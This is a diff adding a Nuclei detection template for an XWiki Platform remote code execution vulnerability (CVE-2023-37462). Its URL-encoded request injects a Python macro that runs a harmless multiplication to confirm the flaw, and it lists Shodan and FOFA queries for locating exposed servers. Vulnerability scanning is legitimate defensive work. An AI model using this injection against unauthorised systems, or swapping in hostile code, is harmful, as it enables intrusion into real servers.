Create CVE-2023-37462.yaml

http/cves/2023/CVE-2023-37462.yaml

@@ -0,0 +1,42 @@
+id: CVE-2023-37462
+info:
+  name: XWiki Platform Remote Code Execution
+  author: parthmalhotra, pdresearch
+  severity: critical
+  reference:
+    - https://github.com/xwiki/xwiki-platform/commit/d9c88ddc4c0c78fa534bd33237e95dea66003d29
+    - https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg
+    - https://jira.xwiki.org/browse/XWIKI-20457
+  metadata:
+    max-request: 2
+    verified: true
+    shodan-query: html:"data-xwiki-reference"
+    fofa-query: body="data-xwiki-reference"
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/wiki/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view"
+      - "{{BaseURL}}/wiki/asyncrenderer/{{url}}?clientId={{id}}&timeout=500&wiki=xwiki"
+
+    cookie-reuse: true
+    skip-variables-check: true
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        internal: true
+        name: id
+        regex:
+          -  data-xwiki-async-client-id="(.+?)"
+      - type: regex
+        part: body
+        group: 1
+        internal: true
+        name: url
+        regex:
+          -  <span class="xwiki-async" data-xwiki-async-id="(.+?)"
+    matchers:
+      - type: word
+        words:
+          - "31557644536232"